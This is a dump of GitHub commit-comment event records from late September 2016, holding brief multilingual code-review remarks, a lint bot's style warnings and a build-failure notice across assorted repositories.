{"id":"4635854366","type":"CommitCommentEvent","actor":{"login":"weblips"},"repo":{"name":"weblips/magento2-learning"},"payload":{"comment":{"id":19220650,"position":null,"line":null,"path":null,"commit_id":"f80093d9168c69bd75682d6b84b1542af2b1bb67","created_at":"2016-09-29T08:47:20Z","updated_at":"2016-09-29T08:47:20Z","body":"Start learning magento2"}},"created_at":"2016-09-29T08:47:20Z"}
{"id":"4635855623","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19220651,"position":25,"line":24,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T08:47:34Z","updated_at":"2016-09-29T08:47:34Z","body":"А условия не позволяют сделать нормальное решение?"}},"created_at":"2016-09-29T08:47:34Z"}
{"id":"4635858832","type":"CommitCommentEvent","actor":{"login":"GawainLynch"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19220655,"position":null,"line":null,"path":null,"commit_id":"6f676a632035c3372c0a72c75266ce9c0854e92d","created_at":"2016-09-29T08:48:12Z","updated_at":"2016-09-29T08:48:12Z","body":"Same … :+1: "}},"created_at":"2016-09-29T08:48:12Z"}
{"id":"4635859680","type":"CommitCommentEvent","actor":{"login":"wongsyrone"},"repo":{"name":"marvinmarnold/web"},"payload":{"comment":{"id":19220657,"position":17,"line":17,"path":"docs/index.txt","commit_id":"d44fe3bc6f020e4b585d01bf40346b24e8536403","created_at":"2016-09-29T08:48:21Z","updated_at":"2016-09-29T08:48:21Z","body":"double spaces in `you  have`"}},"created_at":"2016-09-29T08:48:21Z"}
{"id":"4635861005","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"jacob4684/Polymorphism"},"payload":{"comment":{"id":19220660,"position":17,"line":26,"path":"PersonPolymorphism/AdministrativeEmployee.cs","commit_id":"ee4ebe1fab4a3fafdc61c2e07f096fd1a52fe5c1","created_at":"2016-09-29T08:48:38Z","updated_at":"2016-09-29T08:48:38Z","body":"Tror din region er forkert placeret...."}},"created_at":"2016-09-29T08:48:38Z"}
{"id":"4635862078","type":"CommitCommentEvent","actor":{"login":"X-SPACE-KITT"},"repo":{"name":"X-SPACE-KITT/SPACE"},"payload":{"comment":{"id":19220662,"position":null,"line":null,"path":null,"commit_id":"c1ac4498e493fde3800aa8ca9421ac75167b2b5c","created_at":"2016-09-29T08:48:51Z","updated_at":"2016-09-29T08:48:51Z","body":"C"}},"created_at":"2016-09-29T08:48:51Z"}
{"id":"4635862104","type":"CommitCommentEvent","actor":{"login":"weblips"},"repo":{"name":"weblips/magento2-learning"},"payload":{"comment":{"id":19220663,"position":null,"line":null,"path":null,"commit_id":"f80093d9168c69bd75682d6b84b1542af2b1bb67","created_at":"2016-09-29T08:48:51Z","updated_at":"2016-09-29T08:48:51Z","body":"Основные консольные команды magento2: "}},"created_at":"2016-09-29T08:48:51Z"}
{"id":"4635868947","type":"CommitCommentEvent","actor":{"login":"fbbdev"},"repo":{"name":"binki/autoserve"},"payload":{"comment":{"id":19220671,"position":12,"line":17,"path":"index.js","commit_id":"cbccaf2ac55fa172c59891a9648dd45ab1ec1ded","created_at":"2016-09-29T08:50:14Z","updated_at":"2016-09-29T08:50:14Z","body":"What about exposing getBaseUrl in the request? Or is that too intrusive?\r\n```js\r\nvar platform = module.exports.detect();\r\nvar boundGetBaseUrl = platform.getBaseUrl.bind(platform);\r\nplatform.serve(function (req) {\r\n    req.getBaseUrl = boundGetBaseUrl;\r\n    return app.apply(this, arguments);\r\n});\r\n```"}},"created_at":"2016-09-29T08:50:14Z"}
{"id":"4635870933","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"jacob4684/Polymorphism"},"payload":{"comment":{"id":19220680,"position":2,"line":14,"path":"PersonPolymorphism/AdministrativeEmployee.cs","commit_id":"ee4ebe1fab4a3fafdc61c2e07f096fd1a52fe5c1","created_at":"2016-09-29T08:50:38Z","updated_at":"2016-09-29T08:50:38Z","body":"Prøv at rykke dine tomme linjer sammen. Ikke kun her men alle steder i koden."}},"created_at":"2016-09-29T08:50:38Z"}
{"id":"4635875027","type":"CommitCommentEvent","actor":{"login":"miguel456"},"repo":{"name":"miguel456/php-ip-address-logger"},"payload":{"comment":{"id":19220685,"position":43,"line":0,"path":"login.php","commit_id":"d3775c09c6bcbb54bfdd83bb1391c47b988842eb","created_at":"2016-09-29T08:51:27Z","updated_at":"2016-09-29T08:51:27Z","body":"Don't use get, it is unsupported and unsafe."}},"created_at":"2016-09-29T08:51:27Z"}
{"id":"4635875627","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"classicdb/database"},"payload":{"comment":{"id":19220686,"position":null,"line":null,"path":null,"commit_id":"c0eae8245fe0b37a228939586aa8f4118af19f1a","created_at":"2016-09-29T08:51:35Z","updated_at":"2016-09-29T08:51:35Z","body":"Author is @Zingzah , sorry for missing this.\r\n\r\nFor the turn-in, I honestly did not check that part but you may be right. Everything else was working though when I tested it yesterday."}},"created_at":"2016-09-29T08:51:35Z"}
{"id":"4635878072","type":"CommitCommentEvent","actor":{"login":"BOUDAR90"},"repo":{"name":"BOUDAR90/git"},"payload":{"comment":{"id":19220691,"position":2,"line":2,"path":"index.php","commit_id":"8e8382bbececf21440173ddf0e815d0b5e24debe","created_at":"2016-09-29T08:52:05Z","updated_at":"2016-09-29T08:52:05Z","body":"Merci de modifier cette ligne"}},"created_at":"2016-09-29T08:52:05Z"}
{"id":"4635879252","type":"CommitCommentEvent","actor":{"login":"kossa"},"repo":{"name":"kossa/git"},"payload":{"comment":{"id":19220696,"position":9,"line":7,"path":"index.php","commit_id":"869f6c861e999a5785c1c61848e16de9d3b84624","created_at":"2016-09-29T08:52:19Z","updated_at":"2016-09-29T08:52:19Z","body":"Merci de modifier cette ligne"}},"created_at":"2016-09-29T08:52:19Z"}
{"id":"4635880324","type":"CommitCommentEvent","actor":{"login":"elgenie"},"repo":{"name":"facebook/hhvm"},"payload":{"comment":{"id":19220698,"position":12,"line":1242,"path":"hphp/hack/src/utils/errors.ml","commit_id":"2c97a6b69649b4cc98e1f47ecbd774373d159af3","created_at":"2016-09-29T08:52:31Z","updated_at":"2016-09-29T08:52:31Z","body":"\"Class\" is not correct. We could be dealing with an interface ..."}},"created_at":"2016-09-29T08:52:31Z"}
{"id":"4635880549","type":"CommitCommentEvent","actor":{"login":"jbelala"},"repo":{"name":"jbelala/git"},"payload":{"comment":{"id":19220700,"position":1,"line":1,"path":".gitignore","commit_id":"a0ae093d080605c20256b4001956b853fa3d6258","created_at":"2016-09-29T08:52:35Z","updated_at":"2016-09-29T08:52:35Z","body":"modifier"}},"created_at":"2016-09-29T08:52:35Z"}
{"id":"4635880780","type":"CommitCommentEvent","actor":{"login":"akkouzoubir"},"repo":{"name":"akkouzoubir/git"},"payload":{"comment":{"id":19220701,"position":1,"line":1,"path":"index.php","commit_id":"ecc58a191569b56a2426b9c95b9791861087373d","created_at":"2016-09-29T08:52:38Z","updated_at":"2016-09-29T08:52:38Z","body":"merci"}},"created_at":"2016-09-29T08:52:38Z"}
{"id":"4635882288","type":"CommitCommentEvent","actor":{"login":"elgenie"},"repo":{"name":"facebook/hhvm"},"payload":{"comment":{"id":19220706,"position":3,"line":2,"path":"hphp/hack/test/typecheck/iface_require_incompat4.php.exp","commit_id":"2c97a6b69649b4cc98e1f47ecbd774373d159af3","created_at":"2016-09-29T08:52:56Z","updated_at":"2016-09-29T08:52:56Z","body":"... as illustrated here."}},"created_at":"2016-09-29T08:52:56Z"}
{"id":"4635886736","type":"CommitCommentEvent","actor":{"login":"hedleyroos"},"repo":{"name":"praekelt/django-formfactory"},"payload":{"comment":{"id":19220712,"position":9,"line":7,"path":"formfactory/actions.py","commit_id":"f4bb7cbc3206318625e54373b768ad06d9601c3c","created_at":"2016-09-29T08:53:53Z","updated_at":"2016-09-29T08:53:53Z","body":"Don't use func.__name__. It will with similarly named functions. If think just using `func` will work."}},"created_at":"2016-09-29T08:53:53Z"}
{"id":"4635890585","type":"CommitCommentEvent","actor":{"login":"hedleyroos"},"repo":{"name":"praekelt/django-formfactory"},"payload":{"comment":{"id":19220716,"position":65,"line":32,"path":"formfactory/actions.py","commit_id":"f4bb7cbc3206318625e54373b768ad06d9601c3c","created_at":"2016-09-29T08:54:38Z","updated_at":"2016-09-29T08:54:38Z","body":"I prefer the decorator syntax to this explicit call."}},"created_at":"2016-09-29T08:54:38Z"}
{"id":"4635891427","type":"CommitCommentEvent","actor":{"login":"Diman3589"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19220718,"position":25,"line":24,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T08:54:49Z","updated_at":"2016-09-29T08:54:49Z","body":"Если бы это был реальный проект/заказ, кошелек заказчика пострадал бы, поскольку приходится менять больше 50% решения."}},"created_at":"2016-09-29T08:54:49Z"}
{"id":"4635891438","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19220719,"position":1,"line":1,"path":"фывфыв","commit_id":"c7d16d5623de55b7739625baf521acd5140fa22a","created_at":"2016-09-29T08:54:49Z","updated_at":"2016-09-29T08:54:49Z","body":"фыв"}},"created_at":"2016-09-29T08:54:49Z"}
{"id":"4635892361","type":"CommitCommentEvent","actor":{"login":"MeelisH"},"repo":{"name":"MeelisH/helloworld"},"payload":{"comment":{"id":19220721,"position":null,"line":null,"path":null,"commit_id":"224a551de6b6e6e7a16285a18cbe5850a1214c8e","created_at":"2016-09-29T08:55:01Z","updated_at":"2016-09-29T08:55:01Z","body":"Test1"}},"created_at":"2016-09-29T08:55:01Z"}
{"id":"4635895418","type":"CommitCommentEvent","actor":{"login":"hedleyroos"},"repo":{"name":"praekelt/django-formfactory"},"payload":{"comment":{"id":19220724,"position":11,"line":11,"path":"formfactory/apps.py","commit_id":"f4bb7cbc3206318625e54373b768ad06d9601c3c","created_at":"2016-09-29T08:55:36Z","updated_at":"2016-09-29T08:55:36Z","body":"I would go for `import_module(\"%s.formfactory.actions\" % app.name)`. The extra namespace keeps the app root clean, like templatetags."}},"created_at":"2016-09-29T08:55:36Z"}
{"id":"4635896784","type":"CommitCommentEvent","actor":{"login":"COOPROTON"},"repo":{"name":"COOPROTON/Factorial"},"payload":{"comment":{"id":19220726,"position":null,"line":null,"path":null,"commit_id":"7c66c3c3c23cd7156cae589e9997a7cdf65980bc","created_at":"2016-09-29T08:55:53Z","updated_at":"2016-09-29T08:55:53Z","body":"Two ways of writing a factorial function. The recursive method and normal method through iteration."}},"created_at":"2016-09-29T08:55:53Z"}
{"id":"4635896955","type":"CommitCommentEvent","actor":{"login":"hedleyroos"},"repo":{"name":"praekelt/django-formfactory"},"payload":{"comment":{"id":19220727,"position":13,"line":13,"path":"formfactory/apps.py","commit_id":"f4bb7cbc3206318625e54373b768ad06d9601c3c","created_at":"2016-09-29T08:55:55Z","updated_at":"2016-09-29T08:55:55Z","body":"Just skip it. No need to print."}},"created_at":"2016-09-29T08:55:55Z"}
{"id":"4635897258","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/prde"},"payload":{"comment":{"id":19220729,"position":null,"line":null,"path":null,"commit_id":"dfb7a3a49b5534a91021250faed5a25741effa4d","created_at":"2016-09-29T08:55:58Z","updated_at":"2016-09-29T08:55:58Z","body":"[R/do_magic.R:6:1:](https://github.com/richelbilderbeek/prde/blob/dfb7a3a49b5534a91021250faed5a25741effa4d/R/do_magic.R#L6) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[R/do_magic.R:10:7:](https://github.com/richelbilderbeek/prde/blob/dfb7a3a49b5534a91021250faed5a25741effa4d/R/do_magic.R#L10) *style:* **Use <-, not =, for assignment.**\n```r\n​  out = x * 2;\n      ^\n```\n[R/do_magic.R:11:7:](https://github.com/richelbilderbeek/prde/blob/dfb7a3a49b5534a91021250faed5a25741effa4d/R/do_magic.R#L11) *style:* **Use <-, not =, for assignment.**\n```r\n​  out = replace(out, out == 84, 42);\n      ^\n```"}},"created_at":"2016-09-29T08:55:58Z"}
{"id":"4635906049","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"Mara-AspIT/Examples"},"payload":{"comment":{"id":19220749,"position":4,"line":27,"path":"Examples.Tcp/Server/ServerProgram.cs","commit_id":"049a1808dc62a2f29fd9993e3ac78c6618c12b0f","created_at":"2016-09-29T08:57:40Z","updated_at":"2016-09-29T08:57:40Z","body":"Lav seriøse kommentarer!"}},"created_at":"2016-09-29T08:57:40Z"}
{"id":"4635909228","type":"CommitCommentEvent","actor":{"login":"ambroisemaupate"},"repo":{"name":"maxexcloo/Docker"},"payload":{"comment":{"id":19220764,"position":1,"line":1,"path":"base/data/Dockerfile","commit_id":"71881d37aa68433212f304edda05b6a27616ba22","created_at":"2016-09-29T08:58:19Z","updated_at":"2016-09-29T08:58:19Z","body":"Yes I’ve just read the doc about it, totally agree with you."}},"created_at":"2016-09-29T08:58:19Z"}
{"id":"4635909721","type":"CommitCommentEvent","actor":{"login":"mkhomutov"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":19220766,"position":5,"line":158,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/ColorLegend/Controls/ColorLegend.cs","commit_id":"4c8c805d0de510a9a7e6115038dc7c83f1a30816","created_at":"2016-09-29T08:58:24Z","updated_at":"2016-09-29T08:58:24Z","body":"That is breaking change. Please rename it back\r\nAlways try to avoid making breaking changes. And use ObsoleteExAttribute if you really have to do such changes."}},"created_at":"2016-09-29T08:58:24Z"}
{"id":"4635911101","type":"CommitCommentEvent","actor":{"login":"mtbc"},"repo":{"name":"openmicroscopy/ome-documentation"},"payload":{"comment":{"id":19220769,"position":null,"line":null,"path":null,"commit_id":"cfd0e8a7ab7fffeb155d5f8c3fd1e69b0e9b49f3","created_at":"2016-09-29T08:58:40Z","updated_at":"2016-09-29T08:58:40Z","body":":+1:"}},"created_at":"2016-09-29T08:58:40Z"}
{"id":"4635911322","type":"CommitCommentEvent","actor":{"login":"qoda"},"repo":{"name":"praekelt/django-formfactory"},"payload":{"comment":{"id":19220771,"position":9,"line":7,"path":"formfactory/actions.py","commit_id":"f4bb7cbc3206318625e54373b768ad06d9601c3c","created_at":"2016-09-29T08:58:42Z","updated_at":"2016-09-29T08:58:42Z","body":"That may cause issue when the function name is called in the models, e.g. as a choice, I won't be able to do a lookup on the dict."}},"created_at":"2016-09-29T08:58:42Z"}
{"id":"4635912065","type":"CommitCommentEvent","actor":{"login":"bachp"},"repo":{"name":"bracketttc/poco"},"payload":{"comment":{"id":19220773,"position":null,"line":null,"path":null,"commit_id":"df8e0929083621ad4ed8359e3690efa38a300a27","created_at":"2016-09-29T08:58:52Z","updated_at":"2016-09-29T08:58:52Z","body":"I don't think replacing the file is a good idea. However you can put it alongside the current Config.h and let CMake override the original. However this should only be done if a specific cmake option is given for example `POCO_GENERATE_CONFIG_H`."}},"created_at":"2016-09-29T08:58:52Z"}
{"id":"4635912881","type":"CommitCommentEvent","actor":{"login":"Diman3589"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19220776,"position":127,"line":126,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T08:59:02Z","updated_at":"2016-09-29T08:59:02Z","body":"Верно, это подходит лишь для х32 архитектуры ОС.  Здесь я трачу больше времени на написание метода и передачу аргумента, точнее 4 символа на метод, 4 на каждый вызов(ref + space). Это, безусловно, не выгодно."}},"created_at":"2016-09-29T08:59:02Z"}
{"id":"4635914805","type":"CommitCommentEvent","actor":{"login":"qoda"},"repo":{"name":"praekelt/django-formfactory"},"payload":{"comment":{"id":19220783,"position":65,"line":32,"path":"formfactory/actions.py","commit_id":"f4bb7cbc3206318625e54373b768ad06d9601c3c","created_at":"2016-09-29T08:59:26Z","updated_at":"2016-09-29T08:59:26Z","body":"Will do decorator again, which if the developer prefers can still be used as above."}},"created_at":"2016-09-29T08:59:26Z"}
{"id":"4635915591","type":"CommitCommentEvent","actor":{"login":"qoda"},"repo":{"name":"praekelt/django-formfactory"},"payload":{"comment":{"id":19220784,"position":11,"line":11,"path":"formfactory/apps.py","commit_id":"f4bb7cbc3206318625e54373b768ad06d9601c3c","created_at":"2016-09-29T08:59:34Z","updated_at":"2016-09-29T08:59:34Z","body":"Will do"}},"created_at":"2016-09-29T08:59:34Z"}
{"id":"4635917096","type":"CommitCommentEvent","actor":{"login":"qoda"},"repo":{"name":"praekelt/django-formfactory"},"payload":{"comment":{"id":19220786,"position":13,"line":13,"path":"formfactory/apps.py","commit_id":"f4bb7cbc3206318625e54373b768ad06d9601c3c","created_at":"2016-09-29T08:59:53Z","updated_at":"2016-09-29T08:59:53Z","body":"Should have been removed (debugging)"}},"created_at":"2016-09-29T08:59:53Z"}
{"id":"4635917762","type":"CommitCommentEvent","actor":{"login":"andrewjkennedy"},"repo":{"name":"facebook/hhvm"},"payload":{"comment":{"id":19220788,"position":12,"line":1242,"path":"hphp/hack/src/utils/errors.ml","commit_id":"2c97a6b69649b4cc98e1f47ecbd774373d159af3","created_at":"2016-09-29T09:00:00Z","updated_at":"2016-09-29T09:00:00Z","body":"Good point. Would it suffice to change \"Class\" to \"Type\"?"}},"created_at":"2016-09-29T09:00:00Z"}
{"id":"4635919671","type":"CommitCommentEvent","actor":{"login":"mkhomutov"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":19220799,"position":17,"line":167,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/ColorLegend/Controls/ColorLegend.cs","commit_id":"4c8c805d0de510a9a7e6115038dc7c83f1a30816","created_at":"2016-09-29T09:00:21Z","updated_at":"2016-09-29T09:00:21Z","body":"why not just change  string constant from \"ShowSettingsBox\" to \"\"ShowSettings\""}},"created_at":"2016-09-29T09:00:21Z"}
{"id":"4635919672","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":19220800,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-29T09:00:21Z","updated_at":"2016-09-29T09:00:21Z","body":"![Szeptember 29. - Csütörtök](http://ujlipot.vakvarju.com/data/napimenu/23.jpg?v=1474636430)\nJókai bableves\r\nTúrós csusza sült császárral\r\nÍzes palacsinta"}},"created_at":"2016-09-29T09:00:21Z"}
{"id":"4635920013","type":"CommitCommentEvent","actor":{"login":"ChakreshwarSharma-BTC"},"repo":{"name":"ChakreshwarSharma-BTC/agent-assist"},"payload":{"comment":{"id":19220806,"position":6,"line":14,"path":"app/models/personal_info.rb","commit_id":"522ef034dbf0d3f0ab2809ecb803a4156a19746e","created_at":"2016-09-29T09:00:24Z","updated_at":"2016-09-29T09:00:24Z","body":"@GauravMakwana-BTC : Use string interpolation , spacing issue is also present"}},"created_at":"2016-09-29T09:00:24Z"}
{"id":"4635926173","type":"CommitCommentEvent","actor":{"login":"imVivekGupta"},"repo":{"name":"imVivekGupta/OpenSoft-PS"},"payload":{"comment":{"id":19220815,"position":2,"line":2,"path":"README.md","commit_id":"bb43a1ec9657761d301f9bfc776e0372483719cf","created_at":"2016-09-29T09:01:36Z","updated_at":"2016-09-29T09:01:36Z","body":"A total of 6 problems\r\n"}},"created_at":"2016-09-29T09:01:36Z"}
{"id":"4635926230","type":"CommitCommentEvent","actor":{"login":"thomasmars"},"repo":{"name":"h5p/h5p-drag-question"},"payload":{"comment":{"id":19220816,"position":9,"line":82,"path":"semantics.json","commit_id":"69d75abd43472fabd15f830765d029387801e0ce","created_at":"2016-09-29T09:01:37Z","updated_at":"2016-09-29T09:01:37Z","body":"You did not change the optional property for select fields though. Was this intentional ?"}},"created_at":"2016-09-29T09:01:37Z"}
{"id":"4635926816","type":"CommitCommentEvent","actor":{"login":"shonumi"},"repo":{"name":"shonumi/gbe-plus"},"payload":{"comment":{"id":19220817,"position":null,"line":null,"path":null,"commit_id":"cd3cc4ab15e54e62a4c786793d594488cc8f2f91","created_at":"2016-09-29T09:01:45Z","updated_at":"2016-09-29T09:01:45Z","body":"Click on it once, then hold down the Enter key to advance frames as long as it's pressed.\r\n\r\nDo note, however, that frames cannot be advanced if the LCD is disabled (games do it sometimes to load new graphics). This is to prevent GBE+ from getting stuck in an infinite loop (it could possibly wait for LCD updates that never happen)."}},"created_at":"2016-09-29T09:01:45Z"}
{"id":"4635928195","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19220819,"position":null,"line":null,"path":null,"commit_id":"57b67ad10d728ba030d3ca6147f7f3b2da3a3eb3","created_at":"2016-09-29T09:02:01Z","updated_at":"2016-09-29T09:02:01Z","body":"You forgot the unit test. ;) PR here: #5726"}},"created_at":"2016-09-29T09:02:01Z"}
{"id":"4635932304","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"shinpeimuraoka/ryu"},"payload":{"comment":{"id":19220825,"position":5,"line":430,"path":"ryu/ofproto/nicira_ext.py","commit_id":"07282e8e2ab742cb52132bf3a95faace691918e8","created_at":"2016-09-29T09:02:53Z","updated_at":"2016-09-29T09:02:53Z","body":"keyword って可能なんですか？？"}},"created_at":"2016-09-29T09:02:53Z"}
{"id":"4635936388","type":"CommitCommentEvent","actor":{"login":"JellyBool"},"repo":{"name":"laravel/laravel"},"payload":{"comment":{"id":19220834,"position":null,"line":null,"path":null,"commit_id":"d880fb5f85b9db3c50c05ef6a7d185fb84126e59","created_at":"2016-09-29T09:03:39Z","updated_at":"2016-09-29T09:03:39Z","body":"Highly chance that the errors cause by yourself, and your comment has nothing to do with this comment @sabival89 \r\n\r\n<img width=\"836\" alt=\"2016-09-29_17-00-16\" src=\"https://cloud.githubusercontent.com/assets/6011686/18947667/9dea2d02-8666-11e6-8232-2d3fccfca6af.png\">\r\n"}},"created_at":"2016-09-29T09:03:39Z"}
{"id":"4635936447","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":19220836,"position":null,"line":null,"path":null,"commit_id":"d478cb73cc51f5f65d9061fe2a714b9b0866608c","created_at":"2016-09-29T09:03:42Z","updated_at":"2016-09-29T09:03:42Z","body":"TeamCity Chorus :: chorus-precise64-master Continuous [Build 2.6.668.7c1f4d61d9e772b3ef415de797be61a798872099](http://build.palaso.org/viewLog.html?buildId=77203&buildTypeId=bt323) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:00:08"}},"created_at":"2016-09-29T09:03:42Z"}
{"id":"4635937614","type":"CommitCommentEvent","actor":{"login":"xizhongchen"},"repo":{"name":"ckloss/git-training"},"payload":{"comment":{"id":19220837,"position":null,"line":null,"path":null,"commit_id":"9ccdef9e68b6fc4ce02d513ee82fccaf35098bdd","created_at":"2016-09-29T09:03:57Z","updated_at":"2016-09-29T09:03:57Z","body":"let it be"}},"created_at":"2016-09-29T09:03:57Z"}
{"id":"4635941836","type":"CommitCommentEvent","actor":{"login":"mxgrn"},"repo":{"name":"tiagobarreto/pairs.one"},"payload":{"comment":{"id":19220845,"position":null,"line":null,"path":null,"commit_id":"232d5b61059fbd8e954e44c14ed42699e394ae32","created_at":"2016-09-29T09:04:49Z","updated_at":"2016-09-29T09:04:49Z","body":"Looking forward to this! Let me know whether you need help finishing it."}},"created_at":"2016-09-29T09:04:49Z"}
{"id":"4635944785","type":"CommitCommentEvent","actor":{"login":"PanKaiXin"},"repo":{"name":"lbknxy/AirHockey3"},"payload":{"comment":{"id":19220852,"position":null,"line":null,"path":null,"commit_id":"778132b11d627002cd2302220c6f14dd5d356c18","created_at":"2016-09-29T09:05:25Z","updated_at":"2016-09-29T09:05:25Z","body":"perfect!!! but , I can't open it."}},"created_at":"2016-09-29T09:05:25Z"}
{"id":"4635946665","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"shinpeimuraoka/ryu"},"payload":{"comment":{"id":19220857,"position":7,"line":432,"path":"ryu/ofproto/nicira_ext.py","commit_id":"07282e8e2ab742cb52132bf3a95faace691918e8","created_at":"2016-09-29T09:05:47Z","updated_at":"2016-09-29T09:05:47Z","body":"備忘\r\n\r\nあえて、例を書く必要は無いかと思います。\r\n書いた方が確かに親切ですが、その場合は、\r\n・意味を持たない、よくある値を使う\r\n・変数型がわかるような記載にする（str なら、\" でくくる、など）\r\nを意識した方が良いかと思います。"}},"created_at":"2016-09-29T09:05:47Z"}
{"id":"4635948433","type":"CommitCommentEvent","actor":{"login":"Diman3589"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19220862,"position":121,"line":120,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T09:06:07Z","updated_at":"2016-09-29T09:06:07Z","body":"Ок, исправлю"}},"created_at":"2016-09-29T09:06:07Z"}
{"id":"4635949901","type":"CommitCommentEvent","actor":{"login":"Dimezis"},"repo":{"name":"OleksiiKuzmin/Dimezis"},"payload":{"comment":{"id":19220866,"position":13,"line":7,"path":"src/com/DimezisCheck/MostSimplePolindrome.java","commit_id":"8865dd4fc90c1264888aad858cd7cd635cb93aab","created_at":"2016-09-29T09:06:26Z","updated_at":"2016-09-29T09:06:26Z","body":"This method replaces the whole string with \" \".\r\nThat's completely incorrect\r\n"}},"created_at":"2016-09-29T09:06:26Z"}
{"id":"4635953311","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19220873,"position":23,"line":34,"path":"src/utils/string.h","commit_id":"dce8a4629f811f850344acf5c322023633719761","created_at":"2016-09-29T09:07:07Z","updated_at":"2016-09-29T09:07:07Z","body":":heavy_check_mark: "}},"created_at":"2016-09-29T09:07:07Z"}
{"id":"4635953332","type":"CommitCommentEvent","actor":{"login":"hedleyroos"},"repo":{"name":"praekelt/django-formfactory"},"payload":{"comment":{"id":19220874,"position":9,"line":7,"path":"formfactory/actions.py","commit_id":"f4bb7cbc3206318625e54373b768ad06d9601c3c","created_at":"2016-09-29T09:07:07Z","updated_at":"2016-09-29T09:07:07Z","body":"Then you have to add the full classpath in there, eg. `myapp.actions.some_function`."}},"created_at":"2016-09-29T09:07:07Z"}
{"id":"4635953973","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"shinpeimuraoka/ryu"},"payload":{"comment":{"id":19220875,"position":14,"line":439,"path":"ryu/ofproto/nicira_ext.py","commit_id":"07282e8e2ab742cb52132bf3a95faace691918e8","created_at":"2016-09-29T09:07:14Z","updated_at":"2016-09-29T09:07:14Z","body":"例えば、ここには例が無いというのもあるので、\r\n何処までかくのか？があるかと思います。"}},"created_at":"2016-09-29T09:07:14Z"}
{"id":"4635963463","type":"CommitCommentEvent","actor":{"login":"rz936rz"},"repo":{"name":"rz936rz/Simplon_Game-codes"},"payload":{"comment":{"id":19220900,"position":null,"line":null,"path":null,"commit_id":"10d84ac16d4fc3d836f31df8259dc9e56c9c5f6d","created_at":"2016-09-29T09:09:08Z","updated_at":"2016-09-29T09:09:08Z","body":"Apprenti en codage, vive l'aventure !"}},"created_at":"2016-09-29T09:09:08Z"}
{"id":"4635965556","type":"CommitCommentEvent","actor":{"login":"miguelcobain"},"repo":{"name":"jkleinsc/broccoli-serviceworker"},"payload":{"comment":{"id":19220904,"position":null,"line":null,"path":null,"commit_id":"4041aed9d60e57d1966eef02a047649db4bcc8bf","created_at":"2016-09-29T09:09:32Z","updated_at":"2016-09-29T09:09:32Z","body":"What is the reason behind this?\r\nIf you have something like `ENV.baseURL = '/mobile/';` this will fail."}},"created_at":"2016-09-29T09:09:32Z"}
{"id":"4635966323","type":"CommitCommentEvent","actor":{"login":"Slivo-fr"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19220906,"position":null,"line":null,"path":null,"commit_id":"f3b4efb51a27820a858e450f432246c9f5051a96","created_at":"2016-09-29T09:09:40Z","updated_at":"2016-09-29T09:09:40Z","body":"I experience some errors on latest dev with gym icons :\r\nERROR in app: Exception on /static/forts/shield/Valor_3.png [GET]\r\nFile \"/usr/local/lib/python2.7/dist-packages/playhouse/pool.py\", line 127, in _connect\r\n    raise ValueError('Exceeded maximum connections.')\r\ndoes not crash the server, but happens every time the client load the page.\r\nAnyone else having the same troubles ?"}},"created_at":"2016-09-29T09:09:40Z"}
{"id":"4635967107","type":"CommitCommentEvent","actor":{"login":"gaogao2016"},"repo":{"name":"gaogao2016/hello-world"},"payload":{"comment":{"id":19220911,"position":null,"line":null,"path":null,"commit_id":"1a23260cd61e010d252cae8be272ec07c9183ef3","created_at":"2016-09-29T09:09:49Z","updated_at":"2016-09-29T09:09:49Z","body":" very good"}},"created_at":"2016-09-29T09:09:49Z"}
